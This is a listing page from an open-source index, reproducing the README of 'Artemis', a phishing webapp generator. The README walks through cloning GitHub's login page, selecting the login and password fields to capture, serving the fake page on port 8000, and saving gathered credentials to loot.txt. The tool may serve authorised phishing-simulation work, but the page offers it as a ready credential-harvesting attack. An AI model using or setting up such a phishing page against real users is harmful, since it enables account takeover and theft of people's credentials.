An open API service indexing awesome lists of open source software.

https://github.com/sweetsoftware/artemis

Phishing webapp generator
https://github.com/sweetsoftware/artemis

Last synced: about 1 year ago
JSON representation

Phishing webapp generator

Awesome Lists containing this project

README

          

# Artemis
Phishing webapp generator

## Getting started

```
$ pip install -r requirements.txt

$ ./builder.py 'https://github.com/login'
[*] Found forms:
FORM 0 --> /session
Form to log: 0
Selected form 0

[*] Form fields:
0 - utf8
1 - authenticity_token
2 - login
3 - password
4 - commit
Fields to log (comma separated, e.g 1,4,5): 2,3
Logging: ['login', 'password']

[*] Phishing page ready !
Run now ? (y/n)y
* Running on http://0.0.0.0:8000/ (Press CTRL+C to quit)

```

Gathered credentials are stored in loot.txt.